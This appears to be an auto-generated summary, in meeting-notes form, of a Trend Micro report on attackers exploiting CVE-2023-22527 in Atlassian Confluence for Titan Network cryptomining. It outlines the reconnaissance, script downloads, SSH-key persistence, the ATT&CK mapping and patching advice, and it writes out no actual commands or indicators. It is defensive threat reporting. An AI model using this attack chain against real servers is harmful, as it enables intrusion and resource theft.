October 30, 2024 at 03:44AM
Trend Micro researchers identified an attacker exploiting the CVE-2023-22527 vulnerability in Atlassian Confluence to execute remote code for cryptomining via the Titan Network. The attacker performed reconnaissance, installed Titan binaries on compromised machines, and connected them to the Cassini Testnet, aiming for financial gain through delegated proof of stake rewards.
### Meeting Notes Summary
#### Incident Overview
– **Attack Type**: Exploitation of Atlassian Confluence vulnerability (CVE-2023-22527) for remote code execution (RCE) aimed at cryptomining using the Titan Network.
– **Malicious Actor Tactics**: Utilization of public IP lookup services and various system commands to gather information about the compromised server and then downloading and executing shell scripts to install Titan binaries.
– **Goal**: To connect compromised machines to the Cassini Testnet for reward tokens via delegated proof of stake mechanism.
#### Attack Sequence
1. **Initial Compromise**: Exploited CVE-2023-22527 through template injection.
2. **Information Gathering**:
– Executed commands to assess the system’s filesystem, current directory, and OS information.
– Utilized public IP address lookup services to find additional server IPs.
3. **Payload Deployment**:
– Downloaded and executed multiple shell scripts (named a0, a1, a2, a3, a4).
– Installed Titan binaries and connected to the Titan Network with the attacker’s identity.
4. **Resource Usage**:
– Configured hardware resources for Titan participation and cryptomining through additional clients (aleo-pool).
5. **Persistence Mechanisms**:
– Deployed SSH public keys for potential lateral movement and modified SSH configurations for future access.
#### Conclusion
– **Key Takeaways**:
– The attack effectively utilized a series of techniques to exploit server vulnerabilities and create a persistent resource for cryptomining.
– Highlights the critical importance of timely security patching, system monitoring, and access controls.
– Recommended to adopt security solutions like Trend Vision Oneā¢ for enhanced protection against such threats.
#### MITRE ATT&CK Techniques
| Tactic | Technique | Technique ID |
|———————–|————————————————–|————–|
| Initial Access | Exploit Public-Facing Application | T1190 |
| Discovery | System Information Discovery | T1082 |
| | File and Directory Discovery | T1083 |
| | Process Discovery | T1057 |
| Execution | Command and Scripting Interpreter: Unix Shell | T1059.004 |
| Persistence | Hijack Execution Flow: Dynamic Linker Hijacking | T1574.006 |
| | Account Manipulation: SSH Authorized Keys | T1098.004 |
| Command and Control | Ingress Tool Transfer | T1105 |
| | Application Layer Protocol: Web Protocols | T1071.001 |
#### Indicators of Compromise (IOCs)
– Shell scripts and associated URLs for malicious downloads and communications.
– Listed IP addresses related to the attack.
#### Recommendations
– Ensure all systems are patched against known vulnerabilities.
– Implement rigorous network and file monitoring practices.
– Use advanced security technologies for threat detection and response.